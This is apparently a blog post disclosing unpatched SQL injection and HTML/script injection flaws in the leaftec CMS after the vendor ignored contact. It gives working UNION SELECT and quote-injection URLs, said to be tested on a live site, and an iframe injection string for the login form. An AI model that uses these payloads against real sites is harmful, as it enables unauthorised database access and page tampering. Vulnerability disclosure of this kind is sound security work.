leaftec cms multiple vulnerabilities

leaftec cms is a small CMS being developed by a German individual / German company. Sadly the CMS is not available for free download, so I stumbled across the vulnerabilities while I was visiting a website which was based on the leaftec cms.

I contacted the vendor bud sadly my contact attempts were ignored and the vulnerabilities are still present today.

#1 SQL Injection

Vulnerable URL:

http://www.some-cool-domain.tld/article.php?id=XX

Examples for testing and injecting SQL stuff:

http://www.some-cool-domain.tld/article.php?id=’

http://www.some-cool-domain.tld/article.php?id=”

http://www.some-cool-domain.tld/article.php?id=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,concat(version()),7–

(Tested on a live website using leaftec cms.)

#2 XSS / HTML Code Injection

Several parts of the CMS allow HTML and Java Script code injection, e.g. the login box.

After submitting the form the cms puts a red border around the login and password field but

also implements the injected code into the website.

Example for HTML code:

“><iframe src=http://www.google.de></iframe>

Read all details here.

One thought on “leaftec cms multiple vulnerabilities

Comments are closed.